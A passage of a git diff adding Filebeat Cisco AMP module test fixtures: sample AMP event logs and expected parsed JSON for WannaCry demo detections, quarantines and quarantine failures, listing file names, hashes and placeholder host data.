a31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json new file mode 100644 index 00000000000..7f5499ebf3c --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json @@ -0,0 +1,3734 @@ +[ + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 96000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 0, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 862000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1522, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 659000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 831000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3893, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6745, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 8343, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + 